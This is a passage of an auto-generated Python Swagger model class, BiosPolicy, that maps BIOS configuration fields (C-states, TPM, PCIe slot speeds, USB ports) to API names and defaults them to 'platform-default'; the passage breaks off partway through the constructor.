'pc_ie_ssd_hot_plug_support': 'str',
'pch_usb30mode': 'str',
'pci_option_ro_ms': 'str',
'pci_rom_clp': 'str',
'pop_support': 'str',
'post_error_pause': 'str',
'processor_c1e': 'str',
'processor_c3report': 'str',
'processor_c6report': 'str',
'processor_cstate': 'str',
'profiles': 'list[PolicyAbstractConfigProfileRef]',
'psata': 'str',
'pstate_coord_type': 'str',
'putty_key_pad': 'str',
'pwr_perf_tuning': 'str',
'qpi_link_frequency': 'str',
'qpi_snoop_mode': 'str',
'rank_inter_leave': 'str',
'redirection_after_post': 'str',
'sata_mode_select': 'str',
'select_memory_ras_configuration': 'str',
'serial_port_aenable': 'str',
'single_pctl_enable': 'str',
'slot10link_speed': 'str',
'slot10state': 'str',
'slot11link_speed': 'str',
'slot11state': 'str',
'slot12link_speed': 'str',
'slot12state': 'str',
'slot1link_speed': 'str',
'slot1state': 'str',
'slot2link_speed': 'str',
'slot2state': 'str',
'slot3link_speed': 'str',
'slot3state': 'str',
'slot4link_speed': 'str',
'slot4state': 'str',
'slot5link_speed': 'str',
'slot5state': 'str',
'slot6link_speed': 'str',
'slot6state': 'str',
'slot7link_speed': 'str',
'slot7state': 'str',
'slot8link_speed': 'str',
'slot8state': 'str',
'slot9link_speed': 'str',
'slot9state': 'str',
'slot_flom_link_speed': 'str',
'slot_front_nvme1link_speed': 'str',
'slot_front_nvme2link_speed': 'str',
'slot_front_slot5link_speed': 'str',
'slot_front_slot6link_speed': 'str',
'slot_hba_link_speed': 'str',
'slot_hba_state': 'str',
'slot_lom1link': 'str',
'slot_lom2link': 'str',
'slot_mezz_state': 'str',
'slot_mlom_link_speed': 'str',
'slot_mlom_state': 'str',
'slot_mraid_link_speed': 'str',
'slot_mraid_state': 'str',
'slot_n10state': 'str',
'slot_n11state': 'str',
'slot_n12state': 'str',
'slot_n13state': 'str',
'slot_n14state': 'str',
'slot_n15state': 'str',
'slot_n16state': 'str',
'slot_n17state': 'str',
'slot_n18state': 'str',
'slot_n19state': 'str',
'slot_n1state': 'str',
'slot_n20state': 'str',
'slot_n21state': 'str',
'slot_n22state': 'str',
'slot_n23state': 'str',
'slot_n24state': 'str',
'slot_n2state': 'str',
'slot_n3state': 'str',
'slot_n4state': 'str',
'slot_n5state': 'str',
'slot_n6state': 'str',
'slot_n7state': 'str',
'slot_n8state': 'str',
'slot_n9state': 'str',
'slot_raid_link_speed': 'str',
'slot_raid_state': 'str',
'slot_rear_nvme1link_speed': 'str',
'slot_rear_nvme1state': 'str',
'slot_rear_nvme2link_speed': 'str',
'slot_rear_nvme2state': 'str',
'slot_rear_nvme3state': 'str',
'slot_rear_nvme4state': 'str',
'slot_rear_nvme5state': 'str',
'slot_rear_nvme6state': 'str',
'slot_rear_nvme7state': 'str',
'slot_rear_nvme8state': 'str',
'slot_riser1link_speed': 'str',
'slot_riser1slot1link_speed': 'str',
'slot_riser1slot2link_speed': 'str',
'slot_riser1slot3link_speed': 'str',
'slot_riser2link_speed': 'str',
'slot_riser2slot4link_speed': 'str',
'slot_riser2slot5link_speed': 'str',
'slot_riser2slot6link_speed': 'str',
'slot_sas_state': 'str',
'slot_ssd_slot1link_speed': 'str',
'slot_ssd_slot2link_speed': 'str',
'smee': 'str',
'smt_mode': 'str',
'snc': 'str',
'sparing_mode': 'str',
'sr_iov': 'str',
'streamer_prefetch': 'str',
'svm_mode': 'str',
'terminal_type': 'str',
'tpm_control': 'str',
'tpm_support': 'str',
'txt_support': 'str',
'ucsm_boot_order_rule': 'str',
'usb_emul6064': 'str',
'usb_port_front': 'str',
'usb_port_internal': 'str',
'usb_port_kvm': 'str',
'usb_port_rear': 'str',
'usb_port_sd_card': 'str',
'usb_port_vmedia': 'str',
'usb_xhci_support': 'str',
'vga_priority': 'str',
'vmd_enable': 'str',
'work_load_config': 'str',
'xpt_prefetch': 'str'
}
attribute_map = {
'account_moid': 'AccountMoid',
'ancestors': 'Ancestors',
'create_time': 'CreateTime',
'mod_time': 'ModTime',
'moid': 'Moid',
'object_type': 'ObjectType',
'owners': 'Owners',
'parent': 'Parent',
'tags': 'Tags',
'version_context': 'VersionContext',
'description': 'Description',
'name': 'Name',
'adjacent_cache_line_prefetch': 'AdjacentCacheLinePrefetch',
'all_usb_devices': 'AllUsbDevices',
'altitude': 'Altitude',
'aspm_support': 'AspmSupport',
'assert_nmi_on_perr': 'AssertNmiOnPerr',
'assert_nmi_on_serr': 'AssertNmiOnSerr',
'auto_cc_state': 'AutoCcState',
'autonumous_cstate_enable': 'AutonumousCstateEnable',
'baud_rate': 'BaudRate',
'bme_dma_mitigation': 'BmeDmaMitigation',
'boot_option_num_retry': 'BootOptionNumRetry',
'boot_option_re_cool_down': 'BootOptionReCoolDown',
'boot_option_retry': 'BootOptionRetry',
'boot_performance_mode': 'BootPerformanceMode',
'cbs_cmn_cpu_cpb': 'CbsCmnCpuCpb',
'cbs_cmn_cpu_gen_downcore_ctrl': 'CbsCmnCpuGenDowncoreCtrl',
'cbs_cmn_cpu_global_cstate_ctrl': 'CbsCmnCpuGlobalCstateCtrl',
'cbs_cmn_cpu_l1stream_hw_prefetcher': 'CbsCmnCpuL1streamHwPrefetcher',
'cbs_cmn_cpu_l2stream_hw_prefetcher': 'CbsCmnCpuL2streamHwPrefetcher',
'cbs_cmn_determinism_slider': 'CbsCmnDeterminismSlider',
'cbs_cmn_gnb_nb_iommu': 'CbsCmnGnbNbIommu',
'cbs_cmn_mem_ctrl_bank_group_swap_ddr4': 'CbsCmnMemCtrlBankGroupSwapDdr4',
'cbs_cmn_mem_map_bank_interleave_ddr4': 'CbsCmnMemMapBankInterleaveDdr4',
'cbs_cmnc_tdp_ctl': 'CbsCmncTdpCtl',
'cbs_df_cmn_mem_intlv': 'CbsDfCmnMemIntlv',
'cbs_df_cmn_mem_intlv_size': 'CbsDfCmnMemIntlvSize',
'cdn_enable': 'CdnEnable',
'cdn_support': 'CdnSupport',
'channel_inter_leave': 'ChannelInterLeave',
'cke_low_policy': 'CkeLowPolicy',
'closed_loop_therm_throtl': 'ClosedLoopThermThrotl',
'cmci_enable': 'CmciEnable',
'config_tdp': 'ConfigTdp',
'console_redirection': 'ConsoleRedirection',
'core_multi_processing': 'CoreMultiProcessing',
'cpu_energy_performance': 'CpuEnergyPerformance',
'cpu_frequency_floor': 'CpuFrequencyFloor',
'cpu_performance': 'CpuPerformance',
'cpu_power_management': 'CpuPowerManagement',
'demand_scrub': 'DemandScrub',
'direct_cache_access': 'DirectCacheAccess',
'dram_clock_throttling': 'DramClockThrottling',
'dram_refresh_rate': 'DramRefreshRate',
'energy_efficient_turbo': 'EnergyEfficientTurbo',
'eng_perf_tuning': 'EngPerfTuning',
'enhanced_intel_speed_step_tech': 'EnhancedIntelSpeedStepTech',
'epp_profile': 'EppProfile',
'execute_disable_bit': 'ExecuteDisableBit',
'extended_apic': 'ExtendedApic',
'flow_control': 'FlowControl',
'frb2enable': 'Frb2enable',
'hardware_prefetch': 'HardwarePrefetch',
'hwpm_enable': 'HwpmEnable',
'imc_interleave': 'ImcInterleave',
'intel_hyper_threading_tech': 'IntelHyperThreadingTech',
'intel_turbo_boost_tech': 'IntelTurboBoostTech',
'intel_virtualization_technology': 'IntelVirtualizationTechnology',
'intel_vt_for_directed_io': 'IntelVtForDirectedIo',
'intel_vtd_coherency_support': 'IntelVtdCoherencySupport',
'intel_vtd_interrupt_remapping': 'IntelVtdInterruptRemapping',
'intel_vtd_pass_through_dma_support': 'IntelVtdPassThroughDmaSupport',
'intel_vtdats_support': 'IntelVtdatsSupport',
'ioh_error_enable': 'IohErrorEnable',
'ioh_resource': 'IohResource',
'ip_prefetch': 'IpPrefetch',
'ipv6pxe': 'Ipv6pxe',
'kti_prefetch': 'KtiPrefetch',
'legacy_os_redirection': 'LegacyOsRedirection',
'legacy_usb_support': 'LegacyUsbSupport',
'llc_prefetch': 'LlcPrefetch',
'lom_port0state': 'LomPort0state',
'lom_port1state': 'LomPort1state',
'lom_port2state': 'LomPort2state',
'lom_port3state': 'LomPort3state',
'lom_ports_all_state': 'LomPortsAllState',
'lv_ddr_mode': 'LvDdrMode',
'make_device_non_bootable': 'MakeDeviceNonBootable',
'memory_inter_leave': 'MemoryInterLeave',
'memory_mapped_io_above4gb': 'MemoryMappedIoAbove4gb',
'mirroring_mode': 'MirroringMode',
'mmcfg_base': 'MmcfgBase',
'numa_optimized': 'NumaOptimized',
'onboard10gbit_lom': 'Onboard10gbitLom',
'onboard_gbit_lom': 'OnboardGbitLom',
'onboard_scu_storage_support': 'OnboardScuStorageSupport',
'onboard_scu_storage_sw_stack': 'OnboardScuStorageSwStack',
'organization': 'Organization',
'os_boot_watchdog_timer': 'OsBootWatchdogTimer',
'os_boot_watchdog_timer_policy': 'OsBootWatchdogTimerPolicy',
'os_boot_watchdog_timer_timeout': 'OsBootWatchdogTimerTimeout',
'out_of_band_mgmt_port': 'OutOfBandMgmtPort',
'package_cstate_limit': 'PackageCstateLimit',
'patrol_scrub': 'PatrolScrub',
'patrol_scrub_duration': 'PatrolScrubDuration',
'pc_ie_ssd_hot_plug_support': 'PcIeSsdHotPlugSupport',
'pch_usb30mode': 'PchUsb30mode',
'pci_option_ro_ms': 'PciOptionRoMs',
'pci_rom_clp': 'PciRomClp',
'pop_support': 'PopSupport',
'post_error_pause': 'PostErrorPause',
'processor_c1e': 'ProcessorC1e',
'processor_c3report': 'ProcessorC3report',
'processor_c6report': 'ProcessorC6report',
'processor_cstate': 'ProcessorCstate',
'profiles': 'Profiles',
'psata': 'Psata',
'pstate_coord_type': 'PstateCoordType',
'putty_key_pad': 'PuttyKeyPad',
'pwr_perf_tuning': 'PwrPerfTuning',
'qpi_link_frequency': 'QpiLinkFrequency',
'qpi_snoop_mode': 'QpiSnoopMode',
'rank_inter_leave': 'RankInterLeave',
'redirection_after_post': 'RedirectionAfterPost',
'sata_mode_select': 'SataModeSelect',
'select_memory_ras_configuration': 'SelectMemoryRasConfiguration',
'serial_port_aenable': 'SerialPortAenable',
'single_pctl_enable': 'SinglePctlEnable',
'slot10link_speed': 'Slot10linkSpeed',
'slot10state': 'Slot10state',
'slot11link_speed': 'Slot11linkSpeed',
'slot11state': 'Slot11state',
'slot12link_speed': 'Slot12linkSpeed',
'slot12state': 'Slot12state',
'slot1link_speed': 'Slot1linkSpeed',
'slot1state': 'Slot1state',
'slot2link_speed': 'Slot2linkSpeed',
'slot2state': 'Slot2state',
'slot3link_speed': 'Slot3linkSpeed',
'slot3state': 'Slot3state',
'slot4link_speed': 'Slot4linkSpeed',
'slot4state': 'Slot4state',
'slot5link_speed': 'Slot5linkSpeed',
'slot5state': 'Slot5state',
'slot6link_speed': 'Slot6linkSpeed',
'slot6state': 'Slot6state',
'slot7link_speed': 'Slot7linkSpeed',
'slot7state': 'Slot7state',
'slot8link_speed': 'Slot8linkSpeed',
'slot8state': 'Slot8state',
'slot9link_speed': 'Slot9linkSpeed',
'slot9state': 'Slot9state',
'slot_flom_link_speed': 'SlotFlomLinkSpeed',
'slot_front_nvme1link_speed': 'SlotFrontNvme1linkSpeed',
'slot_front_nvme2link_speed': 'SlotFrontNvme2linkSpeed',
'slot_front_slot5link_speed': 'SlotFrontSlot5linkSpeed',
'slot_front_slot6link_speed': 'SlotFrontSlot6linkSpeed',
'slot_hba_link_speed': 'SlotHbaLinkSpeed',
'slot_hba_state': 'SlotHbaState',
'slot_lom1link': 'SlotLom1link',
'slot_lom2link': 'SlotLom2link',
'slot_mezz_state': 'SlotMezzState',
'slot_mlom_link_speed': 'SlotMlomLinkSpeed',
'slot_mlom_state': 'SlotMlomState',
'slot_mraid_link_speed': 'SlotMraidLinkSpeed',
'slot_mraid_state': 'SlotMraidState',
'slot_n10state': 'SlotN10state',
'slot_n11state': 'SlotN11state',
'slot_n12state': 'SlotN12state',
'slot_n13state': 'SlotN13state',
'slot_n14state': 'SlotN14state',
'slot_n15state': 'SlotN15state',
'slot_n16state': 'SlotN16state',
'slot_n17state': 'SlotN17state',
'slot_n18state': 'SlotN18state',
'slot_n19state': 'SlotN19state',
'slot_n1state': 'SlotN1state',
'slot_n20state': 'SlotN20state',
'slot_n21state': 'SlotN21state',
'slot_n22state': 'SlotN22state',
'slot_n23state': 'SlotN23state',
'slot_n24state': 'SlotN24state',
'slot_n2state': 'SlotN2state',
'slot_n3state': 'SlotN3state',
'slot_n4state': 'SlotN4state',
'slot_n5state': 'SlotN5state',
'slot_n6state': 'SlotN6state',
'slot_n7state': 'SlotN7state',
'slot_n8state': 'SlotN8state',
'slot_n9state': 'SlotN9state',
'slot_raid_link_speed': 'SlotRaidLinkSpeed',
'slot_raid_state': 'SlotRaidState',
'slot_rear_nvme1link_speed': 'SlotRearNvme1linkSpeed',
'slot_rear_nvme1state': 'SlotRearNvme1state',
'slot_rear_nvme2link_speed': 'SlotRearNvme2linkSpeed',
'slot_rear_nvme2state': 'SlotRearNvme2state',
'slot_rear_nvme3state': 'SlotRearNvme3state',
'slot_rear_nvme4state': 'SlotRearNvme4state',
'slot_rear_nvme5state': 'SlotRearNvme5state',
'slot_rear_nvme6state': 'SlotRearNvme6state',
'slot_rear_nvme7state': 'SlotRearNvme7state',
'slot_rear_nvme8state': 'SlotRearNvme8state',
'slot_riser1link_speed': 'SlotRiser1linkSpeed',
'slot_riser1slot1link_speed': 'SlotRiser1slot1linkSpeed',
'slot_riser1slot2link_speed': 'SlotRiser1slot2linkSpeed',
'slot_riser1slot3link_speed': 'SlotRiser1slot3linkSpeed',
'slot_riser2link_speed': 'SlotRiser2linkSpeed',
'slot_riser2slot4link_speed': 'SlotRiser2slot4linkSpeed',
'slot_riser2slot5link_speed': 'SlotRiser2slot5linkSpeed',
'slot_riser2slot6link_speed': 'SlotRiser2slot6linkSpeed',
'slot_sas_state': 'SlotSasState',
'slot_ssd_slot1link_speed': 'SlotSsdSlot1linkSpeed',
'slot_ssd_slot2link_speed': 'SlotSsdSlot2linkSpeed',
'smee': 'Smee',
'smt_mode': 'SmtMode',
'snc': 'Snc',
'sparing_mode': 'SparingMode',
'sr_iov': 'SrIov',
'streamer_prefetch': 'StreamerPrefetch',
'svm_mode': 'SvmMode',
'terminal_type': 'TerminalType',
'tpm_control': 'TpmControl',
'tpm_support': 'TpmSupport',
'txt_support': 'TxtSupport',
'ucsm_boot_order_rule': 'UcsmBootOrderRule',
'usb_emul6064': 'UsbEmul6064',
'usb_port_front': 'UsbPortFront',
'usb_port_internal': 'UsbPortInternal',
'usb_port_kvm': 'UsbPortKvm',
'usb_port_rear': 'UsbPortRear',
'usb_port_sd_card': 'UsbPortSdCard',
'usb_port_vmedia': 'UsbPortVmedia',
'usb_xhci_support': 'UsbXhciSupport',
'vga_priority': 'VgaPriority',
'vmd_enable': 'VmdEnable',
'work_load_config': 'WorkLoadConfig',
'xpt_prefetch': 'XptPrefetch'
}
def __init__(self, account_moid=None, ancestors=None, create_time=None, mod_time=None, moid=None, object_type=None, owners=None, parent=None, tags=None, version_context=None, description=None, name=None, adjacent_cache_line_prefetch='platform-default', all_usb_devices='platform-default', altitude='platform-default', aspm_support='platform-default', assert_nmi_on_perr='platform-default', assert_nmi_on_serr='platform-default', auto_cc_state='platform-default', autonumous_cstate_enable='platform-default', baud_rate='platform-default', bme_dma_mitigation='platform-default', boot_option_num_retry='platform-default', boot_option_re_cool_down='platform-default', boot_option_retry='platform-default', boot_performance_mode='platform-default', cbs_cmn_cpu_cpb='platform-default', cbs_cmn_cpu_gen_downcore_ctrl='platform-default', cbs_cmn_cpu_global_cstate_ctrl='platform-default', cbs_cmn_cpu_l1stream_hw_prefetcher='platform-default', cbs_cmn_cpu_l2stream_hw_prefetcher='platform-default', cbs_cmn_determinism_slider='platform-default', cbs_cmn_gnb_nb_iommu='platform-default', cbs_cmn_mem_ctrl_bank_group_swap_ddr4='platform-default', cbs_cmn_mem_map_bank_interleave_ddr4='platform-default', cbs_cmnc_tdp_ctl='platform-default', cbs_df_cmn_mem_intlv='platform-default', cbs_df_cmn_mem_intlv_size='platform-default', cdn_enable='platform-default', cdn_support='platform-default', channel_inter_leave='platform-default', cke_low_policy='platform-default', closed_loop_therm_throtl='platform-default', cmci_enable='platform-default', config_tdp='platform-default', console_redirection='platform-default', core_multi_processing='platform-default', cpu_energy_performance='platform-default', cpu_frequency_floor='platform-default', cpu_performance='platform-default', cpu_power_management='platform-default', demand_scrub='platform-default', direct_cache_access='platform-default', dram_clock_throttling='platform-default', dram_refresh_rate='platform-default', energy_efficient_turbo='platform-default', eng_perf_tuning='platform-default', enhanced_intel_speed_step_tech='platform-default', epp_profile='platform-default', execute_disable_bit='platform-default', extended_apic='platform-default', flow_control='platform-default', frb2enable='platform-default', hardware_prefetch='platform-default', hwpm_enable='platform-default', imc_interleave='platform-default', intel_hyper_threading_tech='platform-default', intel_turbo_boost_tech='platform-default', intel_virtualization_technology='platform-default', intel_vt_for_directed_io='platform-default', intel_vtd_coherency_support='platform-default', intel_vtd_interrupt_remapping='platform-default', intel_vtd_pass_through_dma_support='platform-default', intel_vtdats_support='platform-default', ioh_error_enable='platform-default', ioh_resource='platform-default', ip_prefetch='platform-default', ipv6pxe='platform-default', kti_prefetch='platform-default', legacy_os_redirection='platform-default', legacy_usb_support='platform-default', llc_prefetch='platform-default', lom_port0state='platform-default', lom_port1state='platform-default', lom_port2state='platform-default', lom_port3state='platform-default', lom_ports_all_state='platform-default', lv_ddr_mode='platform-default', make_device_non_bootable='platform-default', memory_inter_leave='platform-default', memory_mapped_io_above4gb='platform-default', mirroring_mode='platform-default', mmcfg_base='platform-default', numa_optimized='platform-default', onboard10gbit_lom='platform-default', onboard_gbit_lom='platform-default', onboard_scu_storage_support='platform-default', onboard_scu_storage_sw_stack='platform-default', organization=None, os_boot_watchdog_timer='platform-default', os_boot_watchdog_timer_policy='platform-default', os_boot_watchdog_timer_timeout='platform-default', out_of_band_mgmt_port='platform-default', package_cstate_limit='platform-default', patrol_scrub='platform-default', patrol_scrub_duration='platform-default', pc_ie_ssd_hot_plug_support='platform-default', pch_usb30mode='platform-default', pci_option_ro_ms='platform-default', pci_rom_clp='platform-default', pop_support='platform-default', post_error_pause='platform-default', processor_c1e='platform-default', processor_c3report='platform-default', processor_c6report='platform-default', processor_cstate='platform-default', profiles=None, psata='platform-default', pstate_coord_type='platform-default', putty_key_pad='platform-default', pwr_perf_tuning='platform-default', qpi_link_frequency='platform-default', qpi_snoop_mode='platform-default', rank_inter_leave='platform-default', redirection_after_post='platform-default', sata_mode_select='platform-default', select_memory_ras_configuration='platform-default', serial_port_aenable='platform-default', single_pctl_enable='platform-default', slot10link_speed='platform-default', slot10state='platform-default', slot11link_speed='platform-default', slot11state='platform-default', slot12link_speed='platform-default', slot12state='platform-default', slot1link_speed='platform-default', slot1state='platform-default', slot2link_speed='platform-default', slot2state='platform-default', slot3link_speed='platform-default', slot3state='platform-default', slot4link_speed='platform-default', slot4state='platform-default', slot5link_speed='platform-default', slot5state='platform-default', slot6link_speed='platform-default', slot6state='platform-default', slot7link_speed='platform-default', slot7state='platform-default', slot8link_speed='platform-default', slot8state='platform-default', slot9link_speed='platform-default', slot9state='platform-default', slot_flom_link_speed='platform-default', slot_front_nvme1link_speed='platform-default', slot_front_nvme2link_speed='platform-default', slot_front_slot5link_speed='platform-default', slot_front_slot6link_speed='platform-default', slot_hba_link_speed='platform-default', slot_hba_state='platform-default', slot_lom1link='platform-default', slot_lom2link='platform-default', slot_mezz_state='platform-default', slot_mlom_link_speed='platform-default', slot_mlom_state='platform-default', slot_mraid_link_speed='platform-default', slot_mraid_state='platform-default', slot_n10state='platform-default', slot_n11state='platform-default', slot_n12state='platform-default', slot_n13state='platform-default', slot_n14state='platform-default', slot_n15state='platform-default', slot_n16state='platform-default', slot_n17state='platform-default', slot_n18state='platform-default', slot_n19state='platform-default', slot_n1state='platform-default', slot_n20state='platform-default', slot_n21state='platform-default', slot_n22state='platform-default', slot_n23state='platform-default', slot_n24state='platform-default', slot_n2state='platform-default', slot_n3state='platform-default', slot_n4state='platform-default', slot_n5state='platform-default', slot_n6state='platform-default', slot_n7state='platform-default', slot_n8state='platform-default', slot_n9state='platform-default', slot_raid_link_speed='platform-default', slot_raid_state='platform-default', slot_rear_nvme1link_speed='platform-default', slot_rear_nvme1state='platform-default', slot_rear_nvme2link_speed='platform-default', slot_rear_nvme2state='platform-default', slot_rear_nvme3state='platform-default', slot_rear_nvme4state='platform-default', slot_rear_nvme5state='platform-default', slot_rear_nvme6state='platform-default', slot_rear_nvme7state='platform-default', slot_rear_nvme8state='platform-default', slot_riser1link_speed='platform-default', slot_riser1slot1link_speed='platform-default', slot_riser1slot2link_speed='platform-default', slot_riser1slot3link_speed='platform-default', slot_riser2link_speed='platform-default', slot_riser2slot4link_speed='platform-default', slot_riser2slot5link_speed='platform-default', slot_riser2slot6link_speed='platform-default', slot_sas_state='platform-default', slot_ssd_slot1link_speed='platform-default', slot_ssd_slot2link_speed='platform-default', smee='platform-default', smt_mode='platform-default', snc='platform-default', sparing_mode='platform-default', sr_iov='platform-default', streamer_prefetch='platform-default', svm_mode='platform-default', terminal_type='platform-default', tpm_control='platform-default', tpm_support='platform-default', txt_support='platform-default', ucsm_boot_order_rule='platform-default', usb_emul6064='platform-default', usb_port_front='platform-default', usb_port_internal='platform-default', usb_port_kvm='platform-default', usb_port_rear='platform-default', usb_port_sd_card='platform-default', usb_port_vmedia='platform-default', usb_xhci_support='platform-default', vga_priority='platform-default', vmd_enable='platform-default', work_load_config='platform-default', xpt_prefetch='platform-default'):
"""
BiosPolicy - a model defined in Swagger
"""
self._account_moid = None
self._ancestors = None
self._create_time = None
self._mod_time = None
self._moid = None
self._object_type = None
self._owners = None
self._parent = None
self._tags = None
self._version_context = None
self._description = None
self._name = None
self._adjacent_cache_line_prefetch = None
self._all_usb_devices = None
self._altitude = None
self._aspm_support = None
self._assert_nmi_on_perr = None
self._assert_nmi_on_serr = None
self._auto_cc_state = None
self._autonumous_cstate_enable = None
self._baud_rate = None
self._bme_dma_mitigation = None
self._boot_option_num_retry = None
self._boot_option_re_cool_down = None
self._boot_option_retry = None
self._boot_performance_mode = None
self._cbs_cmn_cpu_cpb = None
self._cbs_cmn_cpu_gen_downcore_ctrl = None
self._cbs_cmn_cpu_global_cstate_ctrl = None
self._cbs_cmn_cpu_l1stream_hw_prefetcher = None
self._cbs_cmn_cpu_l2stream_hw_prefetcher = None
self._cbs_cmn_determinism_slider = None
self._cbs_cmn_gnb_nb_iommu = None
self._cbs_cmn_mem_ctrl_bank_group_swap_ddr4 = None
self._cbs_cmn_mem_map_bank_interleave_ddr4 = None
self._cbs_cmnc_tdp_ctl = None
self._cbs_df_cmn_mem_intlv = None
self._cbs_df_cmn_mem_intlv_size = None
self._cdn_enable = None
self._cdn_support = None
self._channel_inter_leave = None
self._cke_low_policy = None
self._closed_loop_therm_throtl = None
self._cmci_enable = None
self._config_tdp = None
self._console_redirection = None
self._core_multi_processing = None
self._cpu_energy_performance = None
self._cpu_frequency_floor = None
self._cpu_performance = None
self._cpu_power_management = None
self._demand_scrub = None
self._direct_cache_access = None
self._dram_clock_throttling = None
self._dram_refresh_rate = None
self._energy_efficient_turbo = None
self._eng_perf_tuning = None
self._enhanced_intel_speed_step_tech = None
self._epp_profile = None
self._execute_disable_bit = None
self._extended_apic = None
self._flow_control = None
self._frb2enable = None
self._hardware_prefetch = None
self._hwpm_enable = None
self._imc_interleave = None
self._intel_hyper_threading_tech = None
self._intel_turbo_boost_tech = None
self._intel_virtualization_technology = None
self._intel_vt_for_directed_io = None
self._intel_vtd_coherency_support = None
self._intel_vtd_interrupt_remapping = None
self._intel_vtd_pass_through_dma_support = None
self._intel_vtdats_support = None
self._ioh_error_enable = None
self._ioh_resource = None
self._ip_prefetch = None
self._ipv6pxe = None
self._kti_prefetch = None
self._legacy_os_redirection = None
self._legacy_usb_support = None
self._llc_prefetch = None
self._lom_port0state = None
self._lom_port1state = None
self._lom_port2state = None
self._lom_port3state = None
self._lom_ports_all_state = None
self._lv_ddr_mode = None
self._make_device_non_bootable = None
self._memory_inter_leave = None
self._memory_mapped_io_above4gb = None
self._mirroring_mode = None
self._mmcfg_base = None
self._numa_optimized = None
self._onboard10gbit_lom = None
self._onboard_gbit_lom = None
self._onboard_scu_storage_support = None
self._onboard_scu_storage_sw_stack = None
self._organization = None
self._os_boot_watchdog_timer = None
self._os_boot_watchdog_timer_policy = None
self._os_boot_watchdog_timer_timeout = None
self._out_of_band_mgmt_port = None
self._package_cstate_limit = None
self._patrol_scrub = None
self._patrol_scrub_duration = None
self._pc_ie_ssd_hot_plug_support = None
self._pch_usb30mode = None
self._pci_option_ro_ms = None
self._pci_rom_clp = None
self._pop_support = None
self._post_error_pause = None
self._processor_c1e = None
self._processor_c3report = None
self._processor_c6report = None
self._processor_cstate = None
self._profiles = None
self._psata = None
self._pstate_coord_type = None
self._putty_key_pad = None
self._pwr_perf_tuning = None
self._qpi_link_frequency = None
self._qpi_snoop_mode = None
self._rank_inter_leave = None
self._redirection_after_post = None
self._sata_mode_select = None
self._select_memory_ras_configuration = None
self._serial_port_aenable = None
self._single_pctl_enable = None
self._slot10link_speed = None
self._slot10state = None
self._slot11link_speed = None
self._slot11state = None
self._slot12link_speed = None
self._slot12state = None
self._slot1link_speed = None
self._slot1state = None
self._slot2link_speed = None
self._slot2state = None
self._slot3link_speed = None
self._slot3state = None
self._slot4link_speed = None
self._slot4state = None
self._slot5link_speed = None
self._slot5state = None
self._slot6link_speed = None
self._slot6state = None
self._slot7link_speed = None
self._slot7state = None
self._slot8link_speed = None
self._slot8state = None
self._slot9link_speed = None
self._slot9state = None
self._slot_flom_link_speed = None
self._slot_front_nvme1link_speed = None
self._slot_front_nvme2link_speed = None
self._slot_front_slot5link_speed = None
self._slot_front_slot6link_speed = None
self._slot_hba_link_speed = None
self._slot_hba_state = None
self._slot_lom1link = None
self._slot_lom2link = None
self._slot_mezz_state = None
self._slot_mlom_link_speed = None
self._slot_mlom_state = None
self._slot_mraid_link_speed = None
self._slot_mraid_state = None
self._slot_n10state = None
self._slot_n11state = None
self._slot_n12state = None
self._slot_n13state = None
self._slot_n14state = None
self._slot_n15state = None
self._slot_n16state = None
self._slot_n17state = None
self._slot_n18state = None
self._slot_n19state = None
self._slot_n1state = None
self._slot_n20state = None
self._slot_n21state = None
self._slot_n22state = None
self._slot_n23state = None
self._slot_n24state = None
self._slot_n2state = None
self._slot_n3state = None
self._slot_n4state = None
self._slot_n5state = None
self._slot_n6state = None
self._slot_n7state = None
self._slot_n8state = None
self._slot_n9state = None
self._slot_raid_link_speed = None
self._slot_raid_state = None
self._slot_rear_nvme1link_speed = None
self._slot_rear_nvme1state = None
self._slot_rear_nvme2link_speed = None
self._slot_rear_nvme2state = None
self._slot_rear_nvme3state = None
self._slot_rear_nvme4state = None
self._slot_rear_nvme5state = None
self._slot_rear_nvme6state = None
self._slot_rear_nvme7state = None
self._slot_rear_nvme8state = None
self._slot_riser1link_speed = None
self._slot_riser1slot1link_speed = None
self._slot_riser1slot2link_speed = None
self._slot_riser1slot3link_speed = None
self._slot_riser2link_speed = None
self._slot_riser2slot4link_speed = None
self._slot_riser2slot5link_speed = None
self._slot_riser2slot6link_speed = None
self._slot_sas_state = None
self._slot_ssd_slot1link_speed = None
self._slot_ssd_slot2link_speed = None
self._smee = None
self._smt_mode = None
self._snc = None
self._sparing_mode = None
self._sr_iov = None
self._streamer_prefetch = None
self._svm_mode = None
self._terminal_type = None
self._tpm_control = None
self._tpm_support = None
self._txt_support = None
self._ucsm_boot_order_rule = None
self._usb_emul6064 = None
self._usb_port_front = None
self._usb_port_internal = None
self._usb_port_kvm = None
self._usb_port_rear = None
self._usb_port_sd_card = None
self._usb_port_vmedia = None
self._usb_xhci_support = None
self._vga_priority = None
self._vmd_enable = None
self._work_load_config = None
self._xpt_prefetch = None
if account_moid is not None:
self.account_moid = account_moid
if ancestors is not None:
self.ancestors = ancestors
if create_time is not None:
self.create_time = create_time
if mod_time is not None:
self.mod_time = mod_time
if moid is not None:
self.moid = moid
if object_type is not None:
self.object_type = object_type
if owners is not None:
self.owners = owners
if parent is not None:
self.parent = parent
if tags is not None:
self.tags = tags
if version_context is not None:
self.version_context = version_context
if description is not None:
self.description = description
if name is not None:
self.name = name
if adjacent_cache_line_prefetch is not None:
self.adjacent_cache_line_prefetch = adjacent_cache_line_prefetch
if all_usb_devices is not None:
self.all_usb_devices = all_usb_devices
if altitude is not None:
self.altitude = altitude
if aspm_support is not None:
self.aspm_support = aspm_support
if assert_nmi_on_perr is not None:
self.assert_nmi_on_perr = assert_nmi_on_perr
if assert_nmi_on_serr is not None:
self.assert_nmi_on_serr = assert_nmi_on_serr
if auto_cc_state is not None:
self.auto_cc_state = auto_cc_state
if autonumous_cstate_enable is not None:
self.autonumous_cstate_enable = autonumous_cstate_enable
if baud_rate is not None:
self.baud_rate = baud_rate
if bme_dma_mitigation is not None:
self.bme_dma_mitigation = bme_dma_mitigation
if boot_option_num_retry is not None:
self.boot_option_num_retry = boot_option_num_retry
if boot_option_re_cool_down is not None:
self.boot_option_re_cool_down = boot_option_re_cool_down
if boot_option_retry is not None:
self.boot_option_retry = boot_option_retry
if boot_performance_mode is not None:
self.boot_performance_mode = boot_performance_mode
if cbs_cmn_cpu_cpb is not None:
self.cbs_cmn_cpu_cpb = cbs_cmn_cpu_cpb
if cbs_cmn_cpu_gen_downcore_ctrl is not None:
self.cbs_cmn_cpu_gen_downcore_ctrl = cbs_cmn_cpu_gen_downcore_ctrl
if cbs_cmn_cpu_global_cstate_ctrl is not None:
self.cbs_cmn_cpu_global_cstate_ctrl = cbs_cmn_cpu_global_cstate_ctrl
